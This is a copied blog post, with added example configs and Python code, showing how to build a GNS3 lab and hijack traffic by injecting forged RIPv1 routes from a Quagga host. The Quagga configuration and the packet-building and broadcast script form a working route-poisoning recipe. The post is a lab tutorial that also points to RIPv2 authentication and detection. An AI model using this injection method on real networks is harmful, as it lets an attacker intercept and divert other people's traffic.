Ikiloh, Exploiting RIPv1 - DigiNinja

Upload: fatkur-rozhi

Post on 05-Jul-2018


8/16/2019 Ikiloh, Exploiting RIPv1 - DigiNinja

22/2/2016 Blog, Exploiting RIPv1 - DigiNinja
https://digi.ninja/blog/rip_v1.php

I started by building the lab using the same 3660 image I used with the VLAN labs but after getting it all set up and running I checked the RIP routing information on all the routers. All showed the correct routes but every route had a metric of 1 rather than the correct value. For example, on R1 there are two hops to the 192.168.1.0 network but it had a metric of just one. After some searching it turned out that this is a known problem with a bunch of devices including the 3660, see this GNS3 forum post for more information.

So, I rebuilt it all using 3745s. These worked, but after I shut the lab down and brought it back up the configurations were all missing. I thought I'd messed up, so I rebuilt it all and made sure I saved everything. Another reboot and the config was gone again. More searching found this forum post which explains that there is a bug with this device and Dynamips where it won't restore the config on boot.

For the third go I used 2611s. These are old and limited devices but in the end they worked successfully.

I added an NM-4E module to each of the devices. Technically this wasn't needed but it gives four extra Ethernet interfaces that may come in useful later.

Forum posts referenced above: http://forum.gns3.net/post8573.html and http://forum.gns3.net/topic2665.html

The following table shows the configuration of each router and host:

Host   Interface      IP              Connected To
R1     e1/0           10.0.0.1        R2 e1/0
R1     e1/3           192.168.0.1     SW1
R2     e1/0           10.0.0.2        R1 e1/0
R2     e1/1           11.0.0.2        R3 e1/1
R3     e1/1           11.0.0.1        R2 e1/1
R3     e1/3           192.168.1.1     SW2
C1     VirtualPC 1    192.168.0.100   SW1
C2     VirtualPC 2    192.168.1.100   SW2
C3     VirtualPC 3    192.168.0.102   SW1
VBox   VirtualBox     192.168.0.101   SW1

SW1 and SW2 are standard GNS3 switches. I tried to use a 3660 with a switch module installed to give more flexibility in the future but for some reason this didn't work properly, so I stuck with the generic GNS3 one. C3 isn't really necessary but was useful just for checking connectivity.

To make it easier to set all this up, here are the commands which will put the three routers into the right state (download ready for cut and paste):

https://digi.ninja/files/rip_lab_setup_commands.txt


Once you have the routers set up you can check that RIP is running correctly by displaying the IP routing table at the enable prompt. As the help text explains, an R in the left-hand column means the device learned the route through RIP. Assuming you have the correct routes you can check connectivity by pinging other devices.

If all that works then the next thing to do is to set up the virtual PCs and the VirtualBox machine. I covered most of this in my first GNS3 and VirtualBox lab so won't cover it all again here, however there is one extra step you need now that we are venturing beyond a single subnet.

To get out of our subnet and see the world you need to add a default gateway when setting the IP address. You do this in the second parameter to the ip command, for example ip 192.168.0.100/24 192.168.0.1 on C1. The gateway IP is the IP of the machine which connects the subnet to the rest of the network, so for C1 this is 192.168.0.1 and for C2 192.168.1.1.

Once you have set the IP of both machines you can check connectivity with some pings. If you find that the pings are failing, the best way to debug is to go back to the routers and check each of them can ping correctly: check R1 can talk to both IPs on R2, that R2 can talk to R3, then R1 to R3. Check the routing table on each to make sure it knows where to send the traffic. If all that works then check C1 can talk to each of the routers. Break it all down and the mistakes tend to be a lot easier to find. This is where C3 can be useful, to check that the mistake isn't with C1.

For the VirtualBox machine I'm using the same machine as in the VLAN lab. In here I set the IP and default route and again test connectivity.


The Attack

After all the setup it is now time to attack the network. The plan is to hijack traffic from C1 heading to C2 and have it delivered to the VBox instead. This will be done by injecting a new route into the network by generating our own RIP packets. We will need to send a packet advertising a route to the 192.168.1.0/24 subnet with a lower metric (number of hops) than the real router. Checking the routing table on R1 shows the metric to get to 192.168.1.0/24 is 2, so we will have to advertise our route with a metric of 1 to be successful; RIP keeps the route it already has when the metrics tie, so merely matching the metric is not enough.

I was initially thinking of using some kind of attack tool or creating custom packets in Scapy but while researching this project I came across Quagga (http://www.nongnu.org/quagga/), a Linux package which implements a router in software. As this is specifically designed to talk the various routing protocols, including RIP, I figured it would be much better to use this than an "attack" tool.

Quagga is pretty simple to set up and can be installed on VBox as a normal Linux package. The config files are stored in /etc/quagga and all we need to edit are the following two files:


daemons
ripd.conf

This simply tells the router that it is talking RIP on eth0 and advertising the route to 192.168.1.0/24. Nothing more is needed: RIPv1 carries no authentication, so any host on the segment that speaks the protocol is believed.
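The two files are not reproduced in this copy of the post, so here is an added example of what they contain for this lab. It is not the post's own configuration: it assumes the Debian-style Quagga packaging (a daemons file that switches each daemon on or off) and that eth0 already carries the 192.168.1.100/24 alias described below; the hostname and password values are placeholders.

```conf
# /etc/quagga/daemons: start only zebra (interface/route manager) and ripd
zebra=yes
bgpd=no
ospfd=no
ospf6d=no
ripd=yes
ripngd=no
isisd=no

! /etc/quagga/ripd.conf
hostname vbox-ripd
password zebra
!
router rip
 ! speak classic RIPv1 (broadcast, no mask, no authentication) on eth0
 version 1
 network eth0
 ! advertise the prefix of the eth0:1 alias, i.e. C2's network, as directly
 ! connected; Quagga sends connected networks with metric 1
 network 192.168.1.0/24
!
log stdout
```

zebra also needs its own /etc/quagga/zebra.conf to exist before the init script will start it; an empty file is enough for this lab.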

As we are planning to hijack traffic heading to C2 I also add a virtual interface to eth0 with the IP address of C2, which allows us to act as C2 once the traffic arrives. If all you want to do is to sniff traffic then you can create a dummy interface on the machine and give that the appropriate IP. I found that if I didn't have an interface on the machine with an IP in the right network then things didn't work as well as with it. This may just have been the way I was doing things but as setting up the interface is easy either way it is worth doing.

To create the virtual interface you can do:

To create a dummy interface you do:

Before starting Quagga let's start up Wireshark so we can see the packets we are creating and make sure they look right. To do this in GNS3 right click on the link between R1 and SW1 and select "Start capturing", then in the capture list on the right hand side right click on the capture and select "Start Wireshark". Add a RIP filter in Wireshark (the display filter is just rip) and put it to one side.

    Now that everything is in place we can start Quagga.

Switch back to Wireshark and, if everything is set up correctly, you will start to see RIP packets coming from 192.168.0.101 advertising its ability to route to 192.168.1.0 with a metric of 1. RIPv1 entries carry no subnet mask, so the advertisement is for the classful network 192.168.1.0.
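To make the metric reasoning in "The Attack" and the packets seen in Wireshark concrete, here is an added Python example (not code from the original post and not Quagga's code). It builds the RIPv1 response a rogue host broadcasts, decodes it the way Wireshark does, and then works out which routers in the lab chain actually switch to the rogue route, including the case from the summary of a further network beyond R3. The addresses and metrics come from the lab table; the topology dict, the router names as graph nodes and the hypothetical R4 are assumptions.

```python
"""RIPv1 route injection: wire format plus a model of who gets poisoned.

Added example, not code from the original post or from Quagga.  Addresses
and metrics come from the lab table; the topology dict and the hypothetical
router R4 beyond R3 are assumptions.
"""
import socket
import struct
from collections import deque

RIP_PORT = 520        # RIP is UDP/520 (RFC 1058)
RIP_RESPONSE = 2      # command field: 1 = request, 2 = response
RIP_V1 = 1
AFI_INET = 2          # address family identifier in each route entry
RIP_INFINITY = 16     # a metric of 16 means "unreachable"


def build_ripv1_response(routes):
    """Encode (network, metric) pairs as a RIPv1 response.  A v1 entry has no
    subnet mask, no next hop and no authentication; the three zero fields are
    what RIPv2 later reused for route tag, mask and next hop."""
    pkt = struct.pack("!BBH", RIP_RESPONSE, RIP_V1, 0)
    for network, metric in routes:
        if not 1 <= metric <= RIP_INFINITY:
            raise ValueError("RIP metric must be 1..16, got %r" % metric)
        pkt += struct.pack("!HH4s4s4sI", AFI_INET, 0, socket.inet_aton(network),
                           b"\0" * 4, b"\0" * 4, metric)
    return pkt


def parse_ripv1(data):
    """Decode a RIP packet into (command, version, [(network, metric), ...]),
    rejecting anything that is not a well-formed v1 packet."""
    if len(data) < 4 or (len(data) - 4) % 20:
        raise ValueError("bad RIP packet length %d" % len(data))
    command, version, _ = struct.unpack("!BBH", data[:4])
    if version != RIP_V1:
        raise ValueError("not a RIPv1 packet (version %d)" % version)
    entries = []
    for off in range(4, len(data), 20):
        afi, _, addr, _, _, metric = struct.unpack("!HH4s4s4sI", data[off:off + 20])
        if afi != AFI_INET:
            raise ValueError("unexpected address family %d" % afi)
        entries.append((socket.inet_ntoa(addr), metric))
    return command, version, entries


def send_ripv1(pkt, src_ip, dst_ip="255.255.255.255"):
    """Broadcast the response on the LAN.  RFC 1058 says a response not sent
    from UDP port 520 is ignored, so the source port is bound too (needs
    root).  Not exercised below; Quagga did this job in the lab."""
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
    s.bind((src_ip, RIP_PORT))
    s.sendto(pkt, (dst_ip, RIP_PORT))
    s.close()


# Lab topology (assumption mirroring the table above): R1-R2-R3 in a line and
# the rogue VBox host on R1's LAN.  Hosts are graph nodes too, so a host's
# advertisement reaches its own router at distance 1.
LAB = {"R1": ["R2", "VBox"], "R2": ["R1", "R3"], "R3": ["R2"], "VBox": ["R1"]}
ROUTERS = ("R1", "R2", "R3")


def distance(graph, src, dst):
    """Hop count between two nodes by BFS; None if unreachable."""
    seen, queue = {src: 0}, deque([src])
    while queue:
        node = queue.popleft()
        if node == dst:
            return seen[node]
        for nxt in graph[node]:
            if nxt not in seen:
                seen[nxt] = seen[node] + 1
                queue.append(nxt)
    return None


def learned_metric(graph, router, advertiser, advertised):
    """Metric `router` installs for a prefix that `advertiser` sends with
    metric `advertised`: the first router to hear it keeps the metric as
    sent and every router after that adds one hop.  Distance 0 is the
    advertiser's own connected route (metric 0); 16 is unreachable."""
    d = distance(graph, advertiser, router)
    if d is None:
        return RIP_INFINITY
    return min(max(advertised + d - 1, 0), RIP_INFINITY)


def poisoned_routers(graph, routers, owner, rogue, rogue_metric=1):
    """Routers that switch to the rogue route for the prefix directly
    connected to `owner`.  RIP only replaces a route for a strictly lower
    metric; on a tie it keeps what it has, so the rogue metric must win."""
    return [r for r in routers
            if learned_metric(graph, r, rogue, rogue_metric)
            < learned_metric(graph, r, owner, 1)]


if __name__ == "__main__":
    pkt = build_ripv1_response([("192.168.1.0", 1)])   # 24 bytes: header + one entry
    print(pkt.hex())
    print(parse_ripv1(pkt))                              # (2, 1, [('192.168.1.0', 1)])
    print(poisoned_routers(LAB, ROUTERS, "R3", "VBox"))      # ['R1']
    print(poisoned_routers(LAB, ROUTERS, "R3", "VBox", 2))   # [] (ties R1's metric 2)
    wider = dict(LAB, R3=["R2", "R4"], R4=["R3"])            # extra network beyond R3
    print(poisoned_routers(wider, ("R1", "R2", "R3", "R4"), "R3", "VBox"))  # ['R1']
```

The model confirms the numbers in the text: R1 holds 192.168.1.0 at metric 2 and takes the rogue metric 1, R2 already has it at metric 1 so the rogue route arriving as 2 is ignored, and a router hanging off R3 would see the rogue route at metric 4 against its own 1. The same parser can be pointed at a capture to flag any RIPv1 response whose source is not one of the known router interfaces, which is about the only detection available for v1.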

To see if the poisoning is working, check R1 to see what it thinks the best route to 192.168.1.0 is.


Comparing with the image above it can be seen that the route has changed from:

to:

We are now in place, let's prove it by hijacking some traffic. On VBox start tcpdump listening for ICMP traffic (for example tcpdump -ni eth0 icmp), then on C1 try to ping C2 (192.168.1.100).


And there we have it, VBox is receiving the pings from C1 (192.168.0.100) which are supposed to be for C2 (192.168.1.100).

Summary

As you can see, this attack is very simple to execute and does not require any special hacking tools. It is slightly limited in that once you have poisoned the route you are no longer able to communicate with the original destination unless you have a second route to it, as you have destroyed the valid route; this means you can't easily do man-in-the-middle attacks. You are also limited in which areas of the network you can poison: in this example it was possible to have R1 accept the new route as VBox is only one hop away whereas C2 is two hops. If there was another network connected to the right of R3 then the hop count from VBox would be higher than that from R3, so the poisoning would not affect it.

If RIP must be used then version 2 offers a small defence against this by adding authentication. I'll look at that, and its effectiveness, in part two.
